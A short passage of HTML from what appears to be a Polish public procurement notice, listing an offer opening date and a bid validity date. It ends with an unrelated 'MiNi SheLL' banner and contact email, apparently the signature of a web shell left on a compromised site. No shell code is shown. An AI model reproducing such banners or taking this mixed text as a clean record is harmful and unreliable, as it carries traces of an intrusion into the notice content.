class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-14 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-12</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com